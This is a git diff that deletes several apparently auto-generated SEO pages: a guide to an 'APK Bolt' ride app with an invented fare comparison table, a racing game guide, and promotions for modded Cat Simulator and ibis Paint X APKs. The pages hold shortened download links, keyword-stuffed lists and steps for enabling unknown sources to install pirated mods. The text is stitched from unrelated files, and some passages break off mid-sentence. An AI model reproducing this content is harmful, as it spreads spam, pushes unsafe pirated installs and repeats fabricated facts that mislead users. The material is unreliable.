  6. -
-

Steps to Request a Ride with APK Bolt

-

After you have installed APK Bolt on your device, you can start using it to request a ride. To do this, you can follow these steps:

-
    -
  1. Open the APK Bolt app, and sign up or log in with your phone number or email address.
  2. -
  3. Select your pickup location and destination by typing them in or using the map.
  4. -
  5. Select the type of ride you want, such as Bolt Lite, Bolt Comfort, or Bolt Green.
  6. -
  7. See the price of your ride before you order, and choose your payment method.
  8. -
  9. Tap on Request a Ride, and wait for a driver to accept your request.
  10. -
  11. See the details of your driver and their vehicle, and contact them if needed.
  12. -
  13. Enjoy your ride, and pay inside the app or with cash.
  14. -
  15. Leave a rating and a tip for your driver if you wish.
  16. -
-

Comparison of APK Bolt with Other Transportation Apps

-

If you are wondering how APK Bolt compares with other transportation apps, such as Uber, Lyft, or Grab, here is a brief overview of their features and prices:

-

Uber

-

Uber is one of the most popular transportation apps in the world, operating in over 80 countries and 900 cities. Uber offers different types of services, such as UberX, UberXL, UberPool, UberBlack, UberEats, and more. Uber's main advantages are its global reach, its variety of options, and its user-friendly interface. However, Uber's main disadvantages are its high prices, its surge pricing during peak hours or high demand, and its controversies over safety and ethics.

-

Lyft

-

Lyft is another popular transportation app in the US and Canada, operating in over 600 cities. Lyft offers different types of services, such as Lyft Line, Lyft Plus, Lyft Premier, Lyft Lux, and more. Lyft's main advantages are its lower prices than Uber, its social and environmental initiatives, and its friendly drivers. However, Lyft's main disadvantages are its limited availability outside the US and Canada, its lack of options in some areas, and its lower quality of service in some cases.

-

Grab

-

Grab is the leading transportation app in Southeast Asia, operating in over 300 cities in 8 countries. Grab offers different types of services, such as GrabCar, GrabTaxi, GrabBike, GrabHitch, GrabExpress, and more. Grab's main advantages are its wide coverage in the region, its local knowledge and expertise, and its integration with other services such as food delivery, payments, and travel. However, Grab's main disadvantages are its high prices in some markets, its frequent cancellations by drivers, and its technical issues and glitches.

-

Table: Features and Prices of Different Transportation Apps

- - - - - - - - - - - - - - - - - - - - - - - - - - -
AppFeaturesPrices
APK Bolt- Fast and affordable rides
- Safety features
- Flexible payment options
- Available in 45 countries and 400 cities
- Base fare: $1.00
- Per mile: $0.50
- Per minute: $0.10
- Minimum fare: $2.00
- Cancellation fee: $1.00
Uber- Global reach
- Variety of options
- User-friendly interface
- Available in over 80 countries and 900 cities
- Base fare: $1.50
- Per mile: $1.00
- Per minute: $0.20
- Minimum fare: $5.00
- Cancellation fee: $5.00
Lyft- Lower prices than Uber
- Social and environmental initiatives
- Friendly drivers
- Available in the US and Canada
- Base fare: $1.00
- Per mile: $0.75
- Per minute: $0.15
- Minimum fare: $3.50
- Cancellation fee: $5.00
Grab- Wide coverage in Southeast Asia
- Local knowledge and expertise
- Integration with other services
- Available in 8 countries and over 300 cities
- Base fare: $1.50
- Per mile: $1.25
- Per minute: $0.25
- Minimum fare: $4.00
- Cancellation fee: $2.00
-

Conclusion

-

In conclusion, APK Bolt is a great app that you can use to get a fast, reliable, and affordable ride to your destination. You can download the APK Bolt file from various sources, install it on your device, and start using it to request a ride from a nearby driver. You can also enjoy the benefits of using APK Bolt, such as safety features, flexible payment options, and competitive prices. You can also compare APK Bolt with other transportation apps, such as Uber, Lyft, or Grab, and see which one suits your needs better.

-

FAQs

-

Here are some frequently asked questions about APK Bolt:

-
    -
  1. Is APK Bolt safe?
    Yes, APK Bolt is safe to use, as it has a range of safety features that ensure your security and peace of mind. You can share details of your journey with your friends or family members, contact the customer support team or the emergency services if needed, and see the ratings and reviews of your driver before you accept the ride.
  2. -
  3. Is APK Bolt legal?
    Yes, APK Bolt is legal to use in most countries where it operates. However, you should check the local laws and regulations before you use APK Bolt in a new location, as some places may have restrictions or bans on ride-hailing services.
  4. -
  5. Is APK Bolt free?
    No, APK Bolt is not free to use, as you have to pay for your ride according to the distance, time, and traffic of your ride. However, APK Bolt offers competitive prices that are cheaper than other transportation apps, and you can also save money by using promo codes, discounts, and offers that are regularly available on the app.
  6. -
  7. How can I contact APK Bolt?
    You can contact APK Bolt by using the in-app chat feature, or by sending an email to support@bolt.eu. You can also visit their website at https://bolt.eu/ or follow them on social media platforms such as Facebook, Twitter, Instagram, or YouTube.
  8. -
  9. How can I update APK Bolt?
    You can update APK Bolt by downloading the latest version of the APK file from the same source that you used to download it initially, and then installing it over the existing app. You can also check for updates within the app by tapping on the menu icon, and then tapping on Settings and About.
  10. -

197e85843d
-
-
\ No newline at end of file diff --git a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Car Traffic Racing Game Stunning 3D Graphics and Smooth Car Handling.md b/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Car Traffic Racing Game Stunning 3D Graphics and Smooth Car Handling.md deleted file mode 100644 index 90e5daa9d7745470be5b9449157364c9ea1cfd47..0000000000000000000000000000000000000000 --- a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Car Traffic Racing Game Stunning 3D Graphics and Smooth Car Handling.md +++ /dev/null @@ -1,141 +0,0 @@ -
-

Download Car Traffic Racing Game: A Guide for Beginners

-

Do you love racing games? Do you want to experience the thrill of driving through busy traffic? Do you want to customize your own car and compete with other players online? If you answered yes to any of these questions, then you should download Car Traffic Racing Game, one of the best car racing games available on Google Play. In this article, we will tell you everything you need to know about this game, including its features, benefits, how to download and install it, how to play it, how to upgrade and customize your car, and how to join online multiplayer races. By the end of this article, you will be ready to hit the road and enjoy the ultimate car racing experience.

-

What is Car Traffic Racing Game?

-

Car Traffic Racing Game is a milestone in the genre of endless arcade racing games. It is developed by TOJ Games, a company that specializes in creating fun and addictive games for mobile devices. Car Traffic Racing Game lets you drive your car through highway traffic, earn cash, upgrade your car, and buy new ones. You can also participate in online races with other players from around the world. You can choose from over 40 different cars and five detailed environments, such as suburb, desert, snowy, rainy, and city night. You can also choose from five game modes, such as Endless, Two-Way, Time Trial, Police Chase, and Free Ride. You can enjoy stunning 3D graphics, smooth and realistic car handling, rich types of NPC traffic, basic customization through paint and wheels, online leaderboards and achievements, and more.

-

download car traffic racing game


Download File >>>>> https://urlin.us/2uSVNq



-

The features of Car Traffic Racing Game

-

Car Traffic Racing Game has many features that make it stand out from other racing games. Some of these features are:

- -

The benefits of playing Car Traffic Racing Game

-

Playing Car Traffic Racing Game is not only fun but also beneficial for you. Some of the benefits are:

- -

How to download and install Car Traffic Racing Game?

-

Downloading and installing Car Traffic Racing Game is easy and fast. Here are the requirements and steps for doing so:

-

Download Traffic Racer game for Android
-How to play Traffic Tour online for free
-Best car racing games with traffic on PC
-Download Traffic Games from CrazyGames website
-Traffic Racer tips and tricks to earn cash and upgrade cars
-Traffic Tour review and gameplay features
-Car traffic racing game with realistic graphics and physics
-Download Traffic Racer mod apk with unlimited money
-How to install Traffic Tour on Windows 10
-Car racing games with traffic and police chase mode
-Download Traffic Games for iOS devices
-Traffic Racer vs Traffic Tour: which one is better?
-Car traffic racing game with different environments and weather
-Download Traffic Racer for Chromebook
-How to play Traffic Tour with friends online
-Car racing games with traffic and customization options
-Download Traffic Games for Mac OS
-Traffic Racer cheats and hacks to unlock all cars
-How to stream Traffic Tour on Twitch or YouTube
-Car traffic racing game with leaderboards and achievements
-Download Traffic Racer for Kindle Fire
-How to play Traffic Tour offline without internet connection
-Car racing games with traffic and time trial mode
-Download Traffic Games for Linux
-Traffic Racer updates and new features
-How to play Traffic Tour with a controller or a steering wheel
-Car traffic racing game with different camera angles and views
-Download Traffic Racer for Samsung Galaxy devices
-How to play Traffic Tour on a big screen TV or a projector
-Car racing games with traffic and free ride mode
-Download Traffic Games for Nokia phones
-Traffic Racer ratings and reviews from users and critics
-How to play Traffic Tour on a VR headset or a 3D monitor
-Car traffic racing game with different game modes and challenges
-Download Traffic Racer for Huawei devices
-How to play Traffic Tour on a laptop or a desktop computer
-Car racing games with traffic and sound effects and music
-Download Traffic Games for Sony Xperia devices
-Traffic Racer FAQs and troubleshooting tips
-How to play Traffic Tour on a tablet or a smartphone
-Car traffic racing game with different car types and models
-Download Traffic Racer for LG devices
-How to play Traffic Tour on a browser or a web app
-Car racing games with traffic and realistic car handling and controls
-Download Traffic Games for Motorola devices
-Traffic Racer system requirements and compatibility issues
-How to play Traffic Tour on a smartwatch or a wearable device
-Car traffic racing game with different languages and subtitles

-

The requirements for downloading Car Traffic Racing Game

-

To download and install Car Traffic Racing Game, you need to have a compatible device and a stable internet connection. The game is compatible with Android devices that have Android 4.4 or higher as their operating system. The game size is about 100 MB, so make sure you have enough storage space on your device.

-

The steps for downloading and installing Car Traffic Racing Game

-

To download and install Car Traffic Racing Game, follow these steps:

-
    -
  1. Open Google Play Store on your device.
  2. -
  3. Search for "Car Traffic Racing Game" or use this link: Car Traffic Racing Game - Apps on Google Play.
  4. -
  5. Tap on the "Install" button to start downloading the game.
  6. -
  7. Wait for the download to finish and then tap on the "Open" button to launch the game.
  8. -
  9. Enjoy playing Car Traffic Racing Game!
  10. -
-

How to play Car Traffic Racing Game?

-

Playing Car Traffic Racing Game is simple and fun. Here are some tips on how to play it:

-

The modes of Car Traffic Racing Game

-

The game has five modes that you can choose from: Endless, Two-Way, Time Trial, Police Chase, and Free Ride. Each mode has its own objective, challenge, and reward.

- -

The controls of Car Traffic Racing Game

-

The game has a simple and intuitive control system that lets you steer your car with ease. You can choose from two options: tilt or touch. You can also adjust the sensitivity of the steering and the camera angle in the settings menu.

- -

The tips and tricks for Car Traffic Racing Game

-

The game is easy to play but hard to master. Here are some tips and tricks that can help you improve your skills and enjoy the game more:

- -

How to upgrade and customize your car in Car Traffic Racing Game?

-

The game allows you to upgrade and customize your car with different options. Here are some details on how to do so:

-

The currency and rewards in Car Traffic Racing Game

-

The game has two types of currency: cash and diamonds. Cash is earned by playing the game modes, while diamonds are earned by watching ads or buying them with real money. You can use cash to buy new cars or upgrade your car's speed, acceleration, handling, or braking. You can use diamonds to buy premium cars or customize your car's paint or wheels.

-

The game also has various rewards that you can get by playing the game modes or completing achievements. Rewards include coins, power-ups, fuel refills, nitro refills, or free cars.

-

The options for upgrading and customizing your car in Car Traffic Racing Game

-

The game has a garage menu where you can upgrade and customize your car. You can access it by tapping on the li>Tap on the "Start" button to begin the race. The game will show you the countdown and then the race will start. -

  • Drive your car as fast and as far as you can, while avoiding traffic, obstacles, and other players. You can see your rank, distance, speed, and overtakes on the top of the screen. You can also see the other players' names, cars, and positions on the map on the bottom right corner of the screen.
  • -
  • When the race is over, the game will show you the results and the rewards. You can see your rank, score, cash, diamonds, and achievements. You can also see the other players' ranks, scores, and cars.
  • -
  • Tap on the "Continue" button to return to the online menu. You can choose to play another race or exit the online mode.
  • - -

    Conclusion

    -

    Car Traffic Racing Game is a fun and addictive game that lets you drive your car through highway traffic, earn cash, upgrade your car, and buy new ones. You can also join online races with other players from around the world. The game has stunning 3D graphics, smooth and realistic car handling, 40+ different cars to choose from, 5 detailed environments, 5 game modes, rich types of NPC traffic, basic customization through paint and wheels, online leaderboards and achievements, and more. If you are looking for a game that can challenge your skills, boost your mood, and enhance your creativity, then you should download Car Traffic Racing Game today. You will not regret it!

    -

    FAQs

    -

    Here are some frequently asked questions about Car Traffic Racing Game:

    -

    197e85843d
    -
    -
    \ No newline at end of file diff --git a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Cat Simulator Annual Life Kitty Pet MOD - The Best Game for Cat Fans.md b/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Cat Simulator Annual Life Kitty Pet MOD - The Best Game for Cat Fans.md deleted file mode 100644 index 8dc68f303ff40971d5ae77ab0e8f4331c77ca81e..0000000000000000000000000000000000000000 --- a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Cat Simulator Annual Life Kitty Pet MOD - The Best Game for Cat Fans.md +++ /dev/null @@ -1,106 +0,0 @@ -
    - - -
    -

    Cat Simulator: Annual Life Kitty Pet Mod APK

    -

    Have you ever wondered what it would be like to live as a cat? To explore a vast world full of adventures, mysteries, and fun? To interact with other animals and make friends or enemies? To customize your kitty with different outfits and accessories? If you answered yes to any of these questions, then you should try Cat Simulator: Annual Life Kitty Pet Mod APK, a game that lets you experience all that and more!

    -

    What is Cat Simulator: Annual Life Kitty Pet Mod APK?

    -

    Cat Simulator: Annual Life Kitty Pet Mod APK is a modified version of Cat Simulator : Kitties Family, a game developed by Avelog Games. In this game, you can choose your kitty from different breeds and colors, and then explore a beautiful 3D world full of different locations, such as a farm, a forest, a lake, and more. You can interact with other animals, such as dogs, cows, chickens, and even other cats. You can also complete various quests and challenges, such as catching mice, stealing food, destroying objects, and more. You can earn coins and rewards for your achievements, and use them to buy new items and accessories for your kitty. You can also unlock new breeds and colors as you progress in the game.

    -

    cat simulator annual life kitty pet mod apk


    Download Ziphttps://urlin.us/2uSYdf



    -

    Cat Simulator: Annual Life Kitty Pet Mod APK is different from the original game in that it gives you access to unlimited coins, unlocked items, and other features that are not available in the original version. This means that you can enjoy the game without any limitations or restrictions. You can customize your kitty however you want, explore the world without any boundaries, and have more fun and excitement.

    -

    How to download and install Cat Simulator: Annual Life Kitty Pet Mod APK?

    -

    Downloading and installing Cat Simulator: Annual Life Kitty Pet Mod APK is very easy and simple. Just follow these steps:

    -
      -
    1. Click on the download button below to get the APK file of the modded version of the game.
    2. -
    3. Once the download is complete, locate the file on your device and tap on it to start the installation process.
    4. -
    5. Allow the installation of unknown sources if prompted by your device.
    6. -
    7. Wait for the installation to finish and then launch the game from your app drawer or home screen.
    8. -
    9. Enjoy playing Cat Simulator: Annual Life Kitty Pet Mod APK with unlimited coins and unlocked items!
    10. -
    -

    Download Cat Simulator: Annual Life Kitty Pet Mod APK

    -

    What are the benefits of Cat Simulator: Annual Life Kitty Pet Mod APK?

    -

    Cat Simulator: Annual Life Kitty Pet Mod APK has many benefits that make it better than the original game. Here are some of them:

    -
      -
    • You get unlimited coins that you can use to buy anything you want in the game.
    • -
    • You get all the items and accessories unlocked from the start, so you can customize your kitty with different outfits, hats, glasses, collars, etc.
    • -
    • You get all the breeds and colors unlocked from the start, so you can choose your kitty from a variety of options.
    • -
    • You get to play the game without any ads or interruptions.
    • -
    • You get to play the game without any bugs or glitches.
    • -
    -

    What are the drawbacks of Cat Simulator: Annual Life Kitty Pet Mod APK?

    -

    Cat Simulator: Annual Life Kitty Pet Mod APK also has some drawbacks that you should be aware of before downloading it. Here are some of them:

    -
      -
    • You may face compatibility issues with some devices or Android versions.
    • -
    • You may face security risks from downloading an unofficial version of the game from unknown sources.
    • -
    • You may lose your progress or data if you uninstall the game or switch to another device.
    • -
    • You may not be able to play online or with other players who have the original version of the game.
    • -
    • You may not be able to receive updates or new features from the developers of the game.
    • -
    -

    How to play Cat Simulator: Annual Life Kitty Pet Mod APK?

    -

    Playing Cat Simulator: Annual Life Kitty Pet Mod APK is very easy and fun. You just need to follow these steps:

    -

    Choose your kitty

    -

    The first thing you need to do is choose your kitty from different breeds and colors. You can swipe left or right on the screen to see the available options. You can also tap on the customize button to change your kitty's appearance, such as its eyes, nose, ears, tail, etc. You can also tap on the dress up button to put on different items and accessories on your kitty, such as hats, glasses, collars, etc. You can save your kitty's look by tapping on the save button.

    -

    cat simulator 2023: live as a kitty in this pet game mod apk
    -cat simulator: family life - adopt and raise kitties mod apk
    -cat simulator: farm adventure - explore the kitty world mod apk
    -cat simulator: online - play with other kitties and pets mod apk
    -cat simulator: realistic 3D - experience the kitty life mod apk
    -cat simulator: ultimate - create your own kitty family mod apk
    -cat simulator: wild life - survive as a feral kitty mod apk
    -cat simulator: winter edition - enjoy the snowy kitty fun mod apk
    -cute kitty cat simulator: pet care and dress up mod apk
    -fluffy cat simulator: cuddle and play with your kitty mod apk
    -funny cat simulator: make your kitty do hilarious things mod apk
    -happy cat simulator: feed and pamper your kitty mod apk
    -kawaii cat simulator: decorate your kitty's home mod apk
    -lazy cat simulator: relax and nap with your kitty mod apk
    -magic cat simulator: cast spells and explore the kitty world mod apk
    -my cat simulator: virtual pet - adopt and love your kitty mod apk
    -my talking kitty cat simulator: chat and play with your pet mod apk
    -naughty cat simulator: prank and annoy your owner mod apk
    -neon cat simulator: glow in the dark with your kitty mod apk
    -pocket cat simulator: carry your kitty everywhere mod apk
    -pregnant cat simulator: take care of your expecting kitty mod apk
    -rainbow cat simulator: enjoy the colorful kitty fun mod apk
    -robot cat simulator: transform and fight with your kitty mod apk
    -scary cat simulator: spook and haunt with your kitty mod apk
    -space cat simulator: travel the galaxy with your kitty mod apk
    -super cat simulator: be a hero with your kitty mod apk
    -talking tom cat simulator: mimic and repeat with your pet mod apk
    -tiny cat simulator: shrink and explore the kitty world mod apk
    -unicorn cat simulator: fly and sparkle with your kitty mod apk
    -warrior cat simulator: battle and hunt with your clan mod apk

    -

    Explore the world

    -

    The next thing you need to do is explore the world around you. You can move your kitty by using the joystick on the left side of the screen. You can also jump by tapping on the jump button on the right side of the screen. You can see your health bar and coin counter at the top of the screen. You can also see your map and quest list at the bottom of the screen. You can tap on them to see more details. You can explore different locations in the game, such as a farm, a forest, a lake, and more. You can find various objects and items in each location that you can interact with by tapping on them.

    -

    Interact with other animals

    -

    Another thing you can do is interact with other animals in the game. You can find different animals in each location, such as dogs, cows, chickens, and even other cats. You can tap on them to see their names and moods. You can also tap on the interact button to do various actions with them, such as play, fight, cuddle, etc. You can also see their health bars and relationship bars at the top of the screen. You can make friends or enemies with other animals depending on your actions. You can also join a cat family or clan by finding a mate and having kittens.

    -

    Complete quests and challenges

    -

    One more thing you can do is complete quests and challenges in the game. You can see your quest list at the bottom of the screen. You can tap on it to see the details of each quest. You can also see the rewards for completing each quest, such as coins, stars, items, etc. You can complete various quests and challenges in the game, such as catching mice, stealing food, destroying objects, and more. You can also see your progress and achievements in the game by tapping on the menu button at the top left corner of the screen.

    -

    Upgrade your kitty

    -

    The last thing you can do is upgrade your kitty in the game. You can use your coins to buy new items and accessories for your kitty in the shop. You can also use your stars to unlock new breeds and colors for your kitty in the gallery. You can also use your coins to upgrade your kitty's skills and abilities, such as speed, stealth, strength, etc. You can also use your coins to buy new homes and furniture for your kitty in the home menu.

    -

    Tips and tricks for Cat Simulator: Annual Life Kitty Pet Mod APK

    -

    Here are some tips and tricks that will help you play Cat Simulator: Annual Life Kitty Pet Mod APK better:

    -

    Use stealth mode

    -

    One tip is to use stealth mode to sneak up on other animals and avoid detection. You can activate stealth mode by tapping on the stealth button on the right side of the screen. When you are in stealth mode, you will become invisible and silent to other animals. You can use this mode to surprise attack other animals or to escape from danger. However, be careful not to bump into other animals or objects while in stealth mode, as this will break your stealth and alert other animals.

    -

    Collect all the stars

    -

    Another tip is to collect all the stars that are hidden in each location. You can find these stars by looking around carefully or by using your map. These stars are very valuable, as they can be used to unlock new items and breeds for your kitty. There are 20 stars in each location, so try to find them all and collect them.

    -

    Watch ads for extra coins

    -

    A final tip is to watch ads for extra coins if you need more money in the game. You can watch ads by tapping on the watch ad button at the top right corner of the screen. You will get 100 coins for each ad you watch. This is a good way to get more coins for free without spending any real money.

    -

    Conclusion

    -

    Cat Simulator: Annual Life Kitty Pet Mod APK is a fun and exciting game that lets you live as a cat in a 3D world full of adventures and interactions. You can choose your kitty from different breeds and colors, explore different locations, interact with other animals, complete quests and challenges, upgrade your kitty, and more. You can also enjoy unlimited coins and unlocked items with this modded version of the game.

    -

    If you love cats and want to experience their life in a realistic and immersive way, then you should download Cat Simulator: Annual Life Kitty Pet Mod APK today and start playing!

    -

    FAQs

    -
      -
    • Q: Is Cat Simulator: Annual Life Kitty Pet Mod APK safe to download?
    • -
    • A: Yes, Cat Simulator: Annual Life Kitty Pet Mod APK is safe to download as long as you get it from a trusted source. However, you should always be careful when downloading any modded or unofficial version of a game from unknown sources, as they may contain viruses or malware that could harm your device.
    • -
    • Q: How do I update Cat Simulator: Annual Life Kitty Pet Mod APK?
    • -
    • A: Unfortunately, you cannot update Cat Simulator: Annual Life Kitty Pet Mod APK from the Google Play Store or from the developers of the game. You will have to download a new version of the modded game from another source whenever there is an update available.
    • -
    • Q: Can I play Cat Simulator: Annual Life Kitty Pet Mod APK online or with other players?
    • -
    • A: No, you cannot play Cat Simulator: Annual Life Kitty Pet Mod APK online or with other players who have the original version of the game. You can only play the modded game offline and by yourself.
    • -
    • Q: What are the best breeds and colors for my kitty in Cat Simulator: Annual Life Kitty Pet Mod APK?
    • -
    • A: The best breeds and colors for your kitty in Cat Simulator: Annual Life Kitty Pet Mod APK depend on your personal preference and style. You can choose from a variety of options, such as Persian, Siamese, Bengal, Maine Coon, etc. You can also choose from different colors, such as black, white, orange, gray, etc. You can mix and match different breeds and colors to create your unique kitty.
    • -
    • Q: How do I save my progress and data in Cat Simulator: Annual Life Kitty Pet Mod APK?
    • -
    • A: You can save your progress and data in Cat Simulator: Annual Life Kitty Pet Mod APK by tapping on the menu button at the top left corner of the screen and then tapping on the save button. You can also load your saved data by tapping on the load button. However, be careful not to uninstall the game or switch to another device, as this may cause you to lose your progress and data.
    • -

    197e85843d
    -
    -
    \ No newline at end of file diff --git a/spaces/1phancelerku/anime-remove-background/Download ibis Paint X MOD APK and Unleash Your Creativity - Premium Unlocked.md b/spaces/1phancelerku/anime-remove-background/Download ibis Paint X MOD APK and Unleash Your Creativity - Premium Unlocked.md deleted file mode 100644 index 8456a893bfca360f3de155488d9452cf45ee5a7b..0000000000000000000000000000000000000000 --- a/spaces/1phancelerku/anime-remove-background/Download ibis Paint X MOD APK and Unleash Your Creativity - Premium Unlocked.md +++ /dev/null @@ -1,200 +0,0 @@ - -

    Download ibis Paint X Mod APK: A Versatile Drawing App for Android

    -

    If you are looking for a drawing app that provides a smooth and comfortable drawing experience with over 15000 brushes, over 15000 materials, over 1000 fonts, 80 filters, 46 screentones, 27 blending modes, and various ruler and clipping mask features, then you should try ibis Paint X. And if you want to enjoy all the premium features of this app for free, then you should download ibis Paint X Mod APK. In this article, we will tell you what is ibis Paint X, what is ibis Paint X Mod APK, how to download and install it, and what are some alternatives to it.

    -

    What is ibis Paint X?

    -

    ibis Paint X is a popular and versatile drawing app downloaded more than 280 million times in total as a series, which provides over 15000 brushes, over 15000 materials, over 1000 fonts, 80 filters, 46 screentones, 27 blending modes, recording drawing processes, stroke stabilization feature, various ruler features such as radial line rulers or symmetry rulers, and clipping mask features. It is an app that allows you to create stunning digital art and comics on your Android device. You can also share your drawing process as a video and learn from other users' drawing techniques on the community site "ibispaint.com".

    -

    download ibis paint x mod apk


    Download Filehttps://jinyurl.com/2uNP5R



    -

    Features of ibis Paint X

    -

    Some of the features of ibis Paint X are:

    -
      -
    • Brushes: You can choose from over 15000 kinds of brushes including dip pens, felt tip pens, digital pens, air brushes, fan brushes, flat brushes, pencils, oil brushes, charcoal brushes, crayons and stamps. You can also adjust various brush parameters such as starting/ending thickness, starting/ending opacity, and initial/final brush angle. You can also use quick sliders to quickly adjust brush thickness and opacity. You can also see real time brush previews.
    • -
    • Layers: You can add as many layers as you need with no limit. You can also set layer parameters such as layer opacity, alpha blending, adding, subtracting, and multiplying. You can also use a handy clipping feature for clipping images. You can also use various layer commands such as layer duplication, import from the photo library, horizontal inversion, vertical inversion, layer rotation, layer moving, and zooming in/out. You can also set layer names to distinguish different layers.
    • -
    • Materials: You can access over 15000 materials in both color and monotone, including traditional Japanese backdrops, patterns, background tones, speech bubbles, line effects, and more.
    • -
    • Fonts: You can use over 1000 fonts for adding text to your drawings. You can also adjust font size, color, alignment, spacing, rotation, and more.
    • -
    • Filters: You can apply over 80 filters to your drawings such as blurring, color balance, gradation or ones generating anime-like or manga-like backgrounds from imported images.
    • -
    • Screentones: You can use over 46 screentones for creating manga-style drawings. You can also adjust screentone size, angle, density, and more.
    • -
    • Blending modes: You can use over 27 blending modes for creating various effects on your drawings such as such as multiply, screen, overlay, darken, lighten, color dodge, color burn, hard light, soft light, difference, exclusion, hue, saturation, color, and luminosity.
    • -
    • Rulers: You can use various ruler features such as radial line rulers or symmetry rulers to assist your drawing. You can also draw a line that follows the direction of the line drawn by you beforehand by using a forced entry/exit ruler.
    • -
    • Clipping mask features: You can clip multiple layers with a single layer. You can also invert the clipping mask and exclude the clipped area.
    • -
    • Recording drawing processes: You can record your drawing process and save it as a video. You can also export your video in high resolution and share it on social media or the community site "ibispaint.com".
    • -
    • Stroke stabilization feature: You can stabilize your strokes by using a stabilization slider. The smoother the stroke will be if the value is larger.
    • -
    • Dark mode: You can switch to dark mode to reduce eye strain and save battery life.
    • -
    • Prime membership: You can become a prime member by paying a monthly fee and enjoy the following benefits: no ads in the app, access to prime materials, access to prime fonts, tone curve filter, gradation map filter, cloud filter, and more.
    • -
    -

    Benefits of ibis Paint X

    -

    Some of the benefits of ibis Paint X are:

    -
      -
    • Easy to use: ibis Paint X has a user-friendly interface that allows you to easily access all the features and tools. You can also customize your toolbar and shortcut settings according to your preference.
    • -
    • Creative and fun: ibis Paint X lets you unleash your creativity and have fun with drawing. You can create various kinds of art and comics with different styles and effects. You can also learn from other users' drawing techniques by watching their videos or browsing their artworks on the community site "ibispaint.com".
    • -
    • Affordable and reliable: ibis Paint X is free to download and use. You can also enjoy most of the features without paying anything. If you want to support the developers and get more features, you can become a prime member for a reasonable price. ibis Paint X is also regularly updated and improved to provide you with the best drawing experience.
    • -
    -

    What is ibis Paint X Mod APK?

    -

    ibis Paint X Mod APK is a modified version of ibis Paint X that allows you to enjoy all the premium features of the app for free. You don't need to pay for the prime membership or watch ads to access the prime materials, fonts, filters, and more. You can also remove the watermark from your videos and export them in high resolution. With ibis Paint X Mod APK, you can have unlimited fun and creativity with drawing.

    -

    Features of ibis Paint X Mod APK

    -

    Some of the features of ibis Paint X Mod APK are:

    -
      -
    • All premium features unlocked: You can access all the premium features of ibis Paint X without paying anything. You can use over 15000 brushes, over 15000 materials, over 1000 fonts, 80 filters, 46 screentones, 27 blending modes, tone curve filter, gradation map filter, cloud filter, and more.
    • -
    • No ads: You don't need to watch ads to use the app or access the prime materials and fonts. You can enjoy a smooth and uninterrupted drawing experience.
    • -
    • No watermark: You don't need to worry about the watermark on your videos. You can export your videos without any watermark and share them with your friends or followers.
    • -
    • High resolution export: You can export your videos in high resolution up to 4K. You can also adjust the frame rate and quality of your videos according to your preference.
    • -
    -

    Benefits of ibis Paint X Mod APK

    -

    Some of the benefits of ibis Paint X Mod APK are:

    -
      -
    • Saves money: You don't need to spend money on the prime membership or buy any in-app purchases. You can get all the premium features for free with ibis Paint X Mod APK.
    • -
    • Saves time: You don't need to waste time on watching ads or waiting for them to finish. You can use the app without any interruption or delay.
    • -
    • Saves storage space: You don't need to download any additional files or updates to use ibis Paint X Mod APK. You can download the app once and enjoy it forever.
    • -
    • Enhances creativity: You can use all the features and tools of ibis Paint X without any limitation or restriction. You can experiment with different brushes, materials, fonts, filters, screentones, blending modes, and more. You can create amazing digital art and comics with ibis Paint X Mod APK.
    • -
    -

    How to Download and Install ibis Paint X Mod APK?

    -

    If you want to download and install ibis Paint X Mod APK on your Android device, you need to follow these simple steps:

    -

    Steps to Download and Install ibis Paint X Mod APK

    -
      -
    1. Download the APK file: You need to download the APK file of ibis Paint X Mod APK from a trusted source. You can use the link below to download the latest version of ibis Paint X Mod APK.
    2. -
    3. Enable unknown sources: You need to enable unknown sources on your device to install the APK file. You can do this by going to Settings > Security > Unknown Sources and turning it on.
    4. -
    5. Install the APK file: You need to locate the downloaded APK file on your device and tap on it to install it. You may need to grant some permissions to the app during the installation process.
    6. -
    7. Launch the app: You need to launch the app by tapping on its icon on your home screen or app drawer. You can now enjoy all the premium features of ibis Paint X for free.
    8. -
    -

    Tips to Use ibis Paint X Mod APK

    -

    Some of the tips to use ibis Paint X Mod APK are:

    -
      -
    • Watch tutorials: If you are new to ibis Paint X or want to learn more about its features and tools, you can watch tutorials on the app or on YouTube. You can also visit the official website of ibis Paint X for more information and support.
    • -
    • Join the community: If you want to share your artworks, get feedback, or learn from other users, you can join the community site "ibispaint.com". You can also follow ibis Paint X on social media platforms such as Facebook, Twitter, Instagram, and TikTok.
    • -
    • Backup your data: If you want to save your drawings, videos, materials, fonts, and settings, you can backup your data on the cloud or on your device. You can do this by going to Settings > Backup/Restore > Backup Data or Restore Data.
    • -
    -

    Alternatives to ibis Paint X Mod APK

    -

    If you are looking for some alternatives to ibis Paint X Mod APK, you can try these apps:

    -

    download ibis paint x mod apk premium unlocked
    -download ibis paint x mod apk latest version
    -download ibis paint x mod apk for android
    -download ibis paint x mod apk free
    -download ibis paint x mod apk no ads
    -download ibis paint x mod apk happymod
    -download ibis paint x mod apk 10.1.3
    -download ibis paint x mod apk unlimited brushes
    -download ibis paint x mod apk pro
    -download ibis paint x mod apk full version
    -download ibis paint x mod apk with prime membership
    -download ibis paint x mod apk 2023
    -download ibis paint x mod apk for pc
    -download ibis paint x mod apk revdl
    -download ibis paint x mod apk rexdl
    -download ibis paint x mod apk 10.0.10
    -download ibis paint x mod apk without watermark
    -download ibis paint x mod apk for ios
    -download ibis paint x mod apk with all features
    -download ibis paint x mod apk 9.1.0
    -download ibis paint x mod apk 8.1.1
    -download ibis paint x mod apk 7.1.0
    -download ibis paint x mod apk 6.4.0
    -download ibis paint x mod apk 5.6.1
    -download ibis paint x mod apk 4.3.2
    -how to download ibis paint x mod apk
    -where to download ibis paint x mod apk
    -best site to download ibis paint x mod apk
    -safe way to download ibis paint x mod apk
    -easy steps to download ibis paint x mod apk
    -benefits of downloading ibis paint x mod apk
    -features of downloading ibis paint x mod apk
    -tips and tricks for downloading ibis paint x mod apk
    -reviews of downloading ibis paint x mod apk
    -alternatives to downloading ibis paint x mod apk
    -problems with downloading ibis paint x mod apk
    -solutions for downloading ibis paint x mod apk
    -guide for downloading ibis paint x mod apk
    -tutorial for downloading ibis paint x mod apk
    -video for downloading ibis paint x mod apk

    -

    List of Alternatives to ibis Paint X Mod APK

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
